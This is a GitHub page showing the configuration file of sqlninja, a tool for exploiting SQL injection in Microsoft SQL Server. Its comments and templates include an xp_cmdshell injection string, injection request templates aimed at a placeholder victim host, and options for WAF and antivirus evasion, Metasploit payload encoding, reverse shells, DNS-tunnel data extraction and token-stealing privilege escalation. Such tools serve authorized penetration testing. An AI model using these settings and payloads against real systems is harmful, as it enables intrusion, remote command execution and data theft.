forked from xxgrunge/sqlninja
-
Notifications
You must be signed in to change notification settings - Fork 0
/
sqlninja.conf
233 lines (193 loc) · 8.95 KB
/
sqlninja.conf
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
###################################
# SQLNINJA CONFIGURATION FILE #
###################################
# options are case sensitive
# see sqlninja-howto.html for more information and examples
###################################
# BASIC CONFIGURATION #
###################################
############ HTTP REQUEST ############
# The entire HTTP request, including the exploit string and a marker for the
# SQL command to execute (__SQL2INJECT__)
# Be sure to include the vulnerable parameter and the character sequence that
# allows us to start injecting commands. In general this means, at least:
# - an apostrophe (if the parameter is a string)
# - a semicolon (to end the original query)
# It must also include everything necessary to properly close the original
# query, like an appropriate number of closing brackets. Don't forget to
# URL-encode, where needed (e.g. a space must become '%20' or '+')
#
# For instance, if you need to inject something like the following:
# <snip>aaa=1&bbb=x';exec+master..xp_cmdshell+'dir+c:'--
# then you should have something like this:
# <snip>aaa=1&bbb=x';__SQL2INJECT__
#
# IMPORTANT!!! Make sure that:
# ONE. The --httprequest_start-- and-- httprequest_end-- markers are in place
# TWO. All required HTTP headers are present
# THREE. There are NO spaces at the beginning of each line
# FOUR. There are NO comment lines
# FIVE. The host is specified in the GET/POST line
# If unsure, refer to a web proxy (e.g.: BurpSuite) for the exact request
# that triggers the injection, making sure that all 5 points above are satisfied
#
# GET EXAMPLE:
--httprequest_start--
GET https://172.16.223.128/checkid.asp?id=1;__SQL2INJECT__ HTTP/1.0
Host: 172.16.223.128
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.13) Gecko/20060418 Firefox/1.0.8
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*
Accept-Language: en-us,en;q=0.7,it;q=0.3
Accept-Charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
Content-Type: application/x-www-form-urlencoded
Connection: close
--httprequest_end--
# POST EXAMPLE: (NB. The Content-Length Header is automatically added by sqlninja!)
# --httprequest_start--
# POST https://www.victim.com/page.asp HTTP/1.0
# Host: www.victim.com
# User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.13) Gecko/20060418 Firefox/1.0.8
# Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*
# Accept-Language: en-us,en;q=0.7,it;q=0.3
# Accept-Charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
# Content-Type: application/x-www-form-urlencoded
# Cookie: ASPSESSIONID=xxxxxxxxxxxxxxxxxxxx
# Authorization: Basic yyyyyyyyyyyyyyyyyyyyy
# Connection: close
#
# vulnerableparam=aaa';__SQL2INJECT__&otherparam=blah
# --httprequest_end--
#
# HEADER-BASED EXAMPLE:
# --httprequest_start--
# GET http://www.victim.com/page.asp HTTP/1.0
# Host: www.victim.com
# User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.13) Gecko/20060418 Firefox/1.0.8
# Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*
# Accept-Language: en-us,en;q=0.7,it;q=0.3
# Accept-Charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
# Content-Type: application/x-www-form-urlencoded
# Cookie: VulnCookie=xxx'%3B__SQL2INJECT__
# Connection: close
# --httprequest_end--
#
# Note that in the last example the semicolon was encoded, otherwise the server would not
# parse __SQL2INJECT__ as part of VulnCookie
# Proxy host to use (default: none)
# proxyhost = 127.0.0.1
# Proxy port to use (default: 8080)
# proxyport = 8080
# Channel to use for data extraction ('time' or 'dns')
data_channel = time
# Domain to use for dnstunnel modes
domain = sqlninja.net
# Time value for the WAITFOR during inference attack of fingerprint and
# bruteforce mode. A higher value makes things slower but will yeld more
# precise results against slow targets.
# Min: 3 seconds. Max: 59 seconds. Default: 5 seconds
blindtime = 5
# Path to metasploit executable. Only needed if msfpayload and
# msfcli are not already in the path
msfpath = /home/user/trunk/
# Evasion techniques to be used. Possible choices are:
# 1 - Query hex-encoding
# 2 - Comments as separators
# 3 - Random case
# 4 - Random URI encoding
# All techniques can be combined, so the following is legal:
# evasion = 1234
# However, keep in mind that using too many techniques at once leads to very
# long queries, that might create problems when using GET. Default: no evasion
# evasion = 1234
# upload_method = vbscript
###################################
# DATA EXTRACTION CONFIGURATION #
###################################
# Channel to use for data extraction ('time' or 'dns')
data_channel = time
# time-based extraction method. Can be one of the following:
# 'binary' = Fewer queries, but likely slower
# 'serial' = More queries, but likely faster
# 'optimized' = Usually best of both worlds, and the default
data_extraction = optimized
# Base language map to use in WAITFOR-based extraction mode ````w
language_map = lib/langs/en.map
# When in optimized mode, use an adaptive map? Default: yes
language_map_adaptive = no
# Store extracted data in a local SQLite DB? Default: yes
# store_session = yes
# Perform sanity check of result data. Applies only to 'time' based data extraction.
# If a result is found to be incorrect it will be extracted again.
# sanity_check = yes
# Allow the user to refresh stored session information
refresh_session = no
###################################
# ADVANCED CONFIGURATION #
###################################
# If the remote server returns a custom error page instead of a standard
# HTTP error code (e.g. 500 Server Error), it is wise to set this value to
# some string that is present in such a page. This will help sqlninja in
# figuring out if things seem to be wrong
# errorstring = "an error has occurred"
# By default, sqlninja appends two hyphens to the injected query in order
# to comment out any spurious SQL code. This is good and works in
# approximately 99% of the cases. However, you might want to change this
# behavior in some very specific scenarios. Change this setting only if you
# really know what you are doing,
# Possible values: yes/no
# appendcomment = yes
# Maximum hostname length for command DNS tunnel (Max: 250 - Default: 250)
# hostnamelength = 250
# Encoder to use with msfencode. If the option is not present, no encoding
# is used. However, it's definitely recommended to use it, if you suspect that
# an AV is present. A list of available encoders can be retrieved by simply
# running "msfencoder -l"
# msfencoder = x86/shikata_ga_nai
# Number of times to encode the metasploit payload. Default: 5
# msfencodecount = 4
# Interface to sniff when in backscan mode
device = eth0
# Local host: your IP address (for backscan and revshell modes)
lhost = 192.168.60.1
# Backscan timeout after web request conclusion (Default: 5 secs)
# timeout = 5
# If you can execute commands but SQL Server does not run as SYSTEM,
# you can use churrasco.exe to steal the appropriate token and escalate
# privileges. Enable this option to use churrasco.exe before executing
# a command. This is especially useful with the metasploit module and VNC
# Obviously, you first need to upload churrasco.exe using
# the upload module!
# usechurrasco = no
# Name of the procedure to use/create to launch commands. Default is
# "xp_cmdshell". If set to "NULL", openrowset+sp_oacreate will be used
# for each command
# xp_name = xp_cmdshell
# When using the Metasploit module DEP is not a problem anymore, since in
# all recent versions of the framework the stager will take care of it by
# itself. However, if needed you can still roll back to the old sqlninja
# behavior and disable DEP by whitelisting the stager with a call to
# xp_regwrite. To do so, set 'checkdep' to 'yes'
# checkdep = no
# You can override the standard marker used to detect where to inject the
# sql attack code. You will probably never need to change this
# sqlmarker = __SQL2INJECT__
# By default, sqlninja uploads files to the directory identified by the
# %TEMP% environment variable. You can override this behavior here.
# Keep in mind that the directory needs will be used by DEBUG.EXE, the
# old 16bit debugger, so the directory needs to be specified with the old
# 8.3 format.
# For instance, C:\Documents and Settings\NetworkService\Local Settings
# becomes C:\DOCUME~1\NETWOR~1\LOCALS~1
# uploaddir = %TEMP%
# tcpdump filter (optional)
# filter = src host x.x.x.x
# Number of script lines to upload with a single HTTP request. A higher number
# obviously means a faster upload. However, do not push this too high if your
# request contains very long parameters. Maximum is 30, and 10 is a default
# safe value providing already a good speed
# lines_per_request = 10
# IP address to return to DNS queries (default: 127.0.0.1)
# Change this only if you know what you are doing, especially
# in data extraction mode, since a wrong IP address contacted
# by xp_dirtree could trigger a whole lot of IDS systems
# resolvedip = 127.0.0.1